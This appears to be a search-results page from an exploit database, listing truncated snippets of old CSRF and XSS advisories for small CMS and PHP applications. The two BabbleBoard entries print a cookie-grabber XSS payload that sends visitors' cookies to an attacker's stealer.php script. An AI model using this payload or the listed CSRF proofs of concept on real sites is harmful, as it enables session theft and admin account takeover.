384 matches found
Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities
Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities Date: Sun 11 Jul 2010 08:08:10 PM EEST Vendor: http://www.novo-ws.com/orbis-cms/ Download: http://www.ohloh.net/p/orbis-cms/download?filename=orbis-1.0.2.zip --- -= CSRF PoC 1 - Change Admin Password =- Orbis CMS 1.0.2 Multiple...
Frog CMS 0.9.5 Multiple CSRF Vulnerabilities
Exploit for php platform in category web applications ============================================ Frog CMS 0.9.5 Multiple CSRF Vulnerabilities ============================================ Date: Sun 11 Jul 2010 10:22:48 AM EEST Vendor: http://www.madebyfrog.com/ Download:...
Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities
Date: Sun 11 Jul 2010 10:22:48 AM EEST Vendor: http://www.madebyfrog.com/ Download: http://www.madebyfrog.com/public/download/files/frog095.tar.gz --- -= CSRF PoC 1 - Create Admin User =- Frog CMS 0.9.5 Multiple CSRF Vulnerabilities - Create Admin User -= CSRF PoC 2 - Delete User =- img...
Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery
Date: Sun 11 Jul 2010 11:53:35 AM EEST Vendor: http://macs-framework.sourceforge.net/ Download: http://sourceforge.net/projects/macs-framework/ --- -= CSRF PoC 1 - Create Admin User =- Macs CMS 1.1.4 Multiple Vulnerabilities XSS/CSRF - Create Admin User -= CSRF PoC 2 - Delete User =- -= XSS PoC =...
Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities
Date: Sun 11 Jul 2010 08:08:10 PM EEST Vendor: http://www.novo-ws.com/orbis-cms/ Download: http://www.ohloh.net/p/orbis-cms/download?filename=orbis-1.0.2.zip --- -= CSRF PoC 1 - Change Admin Password =- Orbis CMS 1.0.2 Multiple CSRF Vulnerabilities - Change Admin Password -= CSRF PoC 2 - Create...
Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities Author: 10n1z3d Date: Sat 10 Jul 2010 08:05:44 PM EEST Vendor: http://elitecms.net/ Download: http://elitecms.net/download.php?download=eliteCMS -= CSRF PoC 1 - Change Admin Password =- Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Chang...
ChillyCMS - Cross-Site Request Forgery
======================================================================= chillyCMS CSRF Vulnerability ======================================================================= Vulnerability found in- Admin module email [email protected] company aksitservices Credit by Pratul Agrawal Software...
cms -db 0.7.13 - Multiple Vulnerabilities
cms -db 0.7.13 - Multiple Vulnerabilities Author: cp77fk4r | Empty0pagESHIFT+2Gmail.com Software Link: http://cms-db.de/download Version: cms -db URL: /cms/admin/newuser.php PARAMS:...
Ez Poll Hoster XSS / XSRF
----------------------------------------------------------------------------------------------- Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities Author: Milos Zivanovic Email: milosz.securityatgmail.com Date: 14. December 2009...
Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
Exploit for unknown platform in category web applications ==================================================== Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities ====================================================...
BabbleBoard 1.1.6 XSRF
BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : document.location ="http://yourdomain/path/stealer.php?cookie=" + document.cookie; Everyone who visit the index page will be...
BabbleBoard 1.1.6 (username) CSRF/Cookie Grabber Exploit
No description provided by source. + BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : scriptdocument.location ="http://yourdomain/path/stealer.php?cookie=" +...
DEBIAN-CVE-2008-5113
WordPress 2.6.3 relies on the REQUEST superglobal array in certain dangerous situations, which makes it easier for remote attackers to conduct delayed and persistent cross-site request forgery CSRF attacks via crafted cookies, as demonstrated by attacks that 1 delete user accounts or 2 cause a...
prozilla-delete.txt
--==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: ...
Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability
Exploit for unknown platform in category web applications =============================================================== Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability ===============================================================...
Prozilla Reviews Script 1.0 - Arbitrary Delete User
--==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: ...
security flaw
Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the 1 session, 2 zip, 3 imap, and 4 sqlite extensions; 5 stream filters; and the 6 strreplace, 7 mail, 8 ibasedeleteuser, 9 ibaseadduser, and 1...
security flaw
Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the 1 session, 2 zip, 3 imap, and 4 sqlite extensions; 5 stream filters; and the 6 strreplace, 7 mail, 8 ibasedeleteuser, 9 ibaseadduser, and 1...
security flaw
Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the 1 session, 2 zip, 3 imap, and 4 sqlite extensions; 5 stream filters; and the 6 strreplace, 7 mail, 8 ibasedeleteuser, 9 ibaseadduser, and 1...
PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit
Exploit for unknown platform in category web applications ============================================================= PHP-Fusion deluser ./fusionimg banuser ./fusionimg delshout ./fusionimg deladmin is the PHP-Fusion version. enter 6.x or 5.x depending on the version number. is the start point ...